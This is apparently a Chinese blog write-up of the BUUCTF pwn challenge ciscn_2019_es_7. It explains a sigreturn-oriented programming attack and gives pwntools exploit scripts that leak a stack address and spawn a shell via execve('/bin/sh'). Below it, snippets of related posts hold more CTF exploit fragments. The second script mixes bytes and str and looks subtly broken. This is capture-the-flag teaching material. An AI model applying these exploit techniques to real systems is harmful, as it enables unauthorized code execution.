buuctf ciscn_2019_es_7的wp

最新推荐文章于 2024-01-30 19:53:40 发布
最新推荐文章于 2024-01-30 19:53:40 发布
阅读量1.2k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyvle/article/details/114854636
版权

在这里插入图片描述
打开一看,我觉得是srop,具体知识不先介绍了
在这里插入图片描述
这是一个最简单的攻击。在这个攻击中,有4个前提条件:
第一,攻击者可以通过stack overflow等漏洞控制栈上的内容;
第二,需要知道栈的地址(比如需要知道自己构造的字符串/bin/sh的地址);
第三,需要知道syscall指令在内存中的地址;
第四,需要知道sigreturn系统调用的内存地址。
我们先要泄露buf在栈上的地址,我们能在sys_read上写0x20个,而wirte可以打印0x30的,
可以泄露

from pwn import *
from LibcSearcher import *
#sh=process("./ciscn_2019_es_7.dms")
context.arch='amd64'
sh=remote("f.buuoj.cn",20179)
syscall_ret=0x400517
read=0x4004f1
movrax_sigreturn=0x4004da
movrax_system=0x4004E2
sh.send("/bin/sh"+"\x00"*9+p64(read))
sh.recv(32)
stack_addr=u64(sh.recv(8))
log.success("stack: "+hex(stack_addr))
sh.recv(8)

在这里插入图片描述
调试的时候使用info proc map命令查看当前进程的内存映射
在这里插入图片描述
计算两者的偏移,每次加载的地址都不一样,但是泄露的栈地址和bin/sh的偏移是固定的,所以我们可以用stack_addr-0x118来表示bin/sh的地址
这里面就有了栈地址和bin/sh的地址,满足了第二个条件
找一下syscall;ret指令在内存中的地址,利用SROP构造系统调用串(System call chains),满足了第三个条件
在这里插入图片描述

最后找找sigreturn系统调用的内存地址
在这里插入图片描述
给我们把rax复制我们想要的,很贴心
条件都满足了,接下来就可以用pwntools来帮助我们生成这个Signal Frame了
pwntools可以完成
exp

from pwn import *
from LibcSearcher import *
#context.arch='amd64'
context(os='linux',arch='amd64',log_level='debug')

p=process("./ciscn_2019_es_7")
#p=remote('node3.buuoj.cn',26447)

syscall_ret=0x400517
sigreturn_addr=0x4004da
system_addr=0x4004E2	

rax=0x4004f1

p.send(b"/bin/sh"+b"\x00"*9+p64(rax))
p.recv(32)
stack_addr=u64(p.recv(8))
log.success("stack: "+hex(stack_addr))
p.recv(8)

#gdb.attach(p)

sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = stack_addr - 0x118  
sigframe.rsi = 0x0
sigframe.rdx = 0x0
sigframe.rsp = stack_addr
sigframe.rip = syscall_ret

p.send(b"/bin/sh"+"\x00"*(0x1+0x8)+p64(sigreturn_addr)+p64(syscall_ret)+str(sigframe))

p.interactive()
w0nderMaker
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF WP
Panacea
04-25 1305
MISC 最简单 首先使用winrar修复伪加密 查看文件尾,发现是png结尾 png知识参考https://www.cnblogs.com/senior-engineer/p/9548347.html 更改文件尾得到图片后使用16进制转字符串得到flag 十六进制转字符串网站:https://www.sojson.com/hexadecimal.htm Misc-A_Beautiful_Pi...
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 544
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
buuctf ciscn_2019_es_7
qq_42728977的博客
04-13 829
srop 之前听说过,但是没做过,今天算是见识了。 整体思路就是 就是在内核返回到用户时,会把原来的context(保存在栈里)给复原,栈里
[BUUCTF]ciscn_2019_es_7(SROP)
zyxx_wjc的博客
07-12 345
[BUUCTF]ciscn_2019_es_7
[BUUCTF]PWN——ciscn_2019_es_7[详解]
mcmuyanga的博客
01-12 1549
ciscn_2019_es_7 附件 步骤: 例行检查,64位程序,开启了nx保护 本地试运行一下看看大概的情况 64位ida载入,关键函数很简单,两个系统调用,buf存在溢出 看到系统调用和溢出,想到了SROP,之前遇到过一次,关于原理可以看一下这两篇文章 https://www.freebuf.com/articles/network/87447.html https://ctf-wiki.org/pwn/linux/stackoverflow/advanced-rop/srop/?h=+sr
ciscn_2019_es_7
m0_73756460的博客
02-27 184
buu刷题ciscn_2019_es_7【wp
【pwn】ciscn_2019_es_2
Nothing
12-24 2778
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在栈溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到栈地址,然后进行栈迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置栈数据。 from pwn import * #io=process('ciscn...
BUUCTF-PWN刷题记录-5(Tcache)
weixin_44145820的博客
04-13 1397
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置空,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
es-wp-query, 在替换WP_Query以利用Elasticsearch进行复杂查询时,.zip
09-18
es-wp-query, 在替换WP_Query以利用Elasticsearch进行复杂查询时, 用于的Elasticsearch封装替代WP_Query的替代,以利用Elasticsearch进行复杂查询。警告警告 !这个插件目前处于beta开发阶段,因此,它的任何部分都...
Elasticsearch出现circuit_breaking_exception异常
01-07
经排查,原来是ES默认的缓存设置让缓存区只进不出引起的,具体分析一下。 2. ES缓存区概述 首先简单描述一下ES的缓存机制。ES在查询时,会将索引数据缓存在内存(JVM)中: 驱逐线 和 断路器。当缓存数据到达驱逐...
kotti_es:Kotti ElasticSearch 实现
05-31
科蒂斯 这是 Kotti 的扩展,允许向您的站点添加 ElasticSearch ( ) 支持。 它基于一个 pyramid_es fork(有一个待定的 PR,...3- 让您在安装kotti_es之前针对 ElasticSearch 已经存在的内容建立kotti_es 。 请参阅reind
ciscn_2019_sw_7
seaaseesa的博客
05-01 536
ciscn_2019_sw_7 首先检查一下程序的保护机制 然后,我们用IDA分析一下,最多创建10个堆,并且size不能超过0x60 Delete功能没有清空指针,因此可以double free。 由于size受限制,因此我们需要伪造一个unsorted bin范围的chunk,glibc版本2.27,存在tcache,因此,我们还要先攻击tcache bin表头,篡改对应的...
ciscn_2019_es_7 6/100
m0_57754423的博客
03-02 283
漏洞点: 经典SROP write函数泄露栈的地址 栈上写入'/bin/sh'字符串,控制rdi为 sh 字符串地址,rax为sigreturn系统调用号 exp: from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './es_7' debug = 1 if debug: r = remote('node4.buuoj.cn', 28915) else: r
[BUUCTF]-PWN:ciscn_2019_es_7解析(系统调用execve,srop)
2301_79326813的博客
01-30 328
这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell。
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 425
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
BUUCTF Crypto [INSHack2019]Yet Another RSA Challenge - Part 1 wp
hsqGOD's blog
04-23 713
这道题告诉你了rsa的n的因子其中的p,但是其中的字母有所替换,我们就可以发现,这串字符中的‘FC’可能是’FC‘也可能是’9F’于是话不多说直接爆破即可,下面给出本题脚本 import gmpy2 from Crypto.Util.number import * n=71957974565330311902587309804384891397688083828663581735179018970...
ant-design-vue-2.0.0-beta.5.zip
最新发布
08-26
基于 Ant Design 和 Vue 的企业级 UI 组件库
es 删除数据_干货 | 携程Elasticsearch数据同步实践
06-07
您需要关于 Elasticsearch 的数据删除操作的信息吗?如果是的话,可以使用 Elasticsearch 提供的 Delete API 来删除单个或多个文档。例如,您可以使用以下命令删除具有指定 ID 的单个文档: ``` DELETE /my_index/_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值